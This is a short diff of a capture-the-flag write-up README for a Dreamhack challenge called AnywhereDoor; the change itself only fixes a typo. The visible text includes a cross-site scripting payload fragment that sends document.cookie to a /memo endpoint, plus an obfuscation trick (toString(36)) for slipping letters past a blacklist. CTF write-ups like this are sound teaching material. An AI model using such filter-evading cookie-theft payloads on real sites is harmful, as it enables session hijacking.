jeff-160/CTF-writeups/Dreamhack/AnywhereDoor/README.md

 [`/memo?memo=`,document.cookie].join(String(0).slice(0,0))
 ```

-`document.cookie` doesn't trigger the blacklist, so we only have to obfuscate the `/memo` enpdoint call.
+`document.cookie` doesn't trigger the blacklist, so we only have to obfuscate the `/memo` endpoint call.
 For alphabets, we can convert their ASCII value to strings using `toString(36)`.

 ```javascript
 (10).toString(36)   // "a"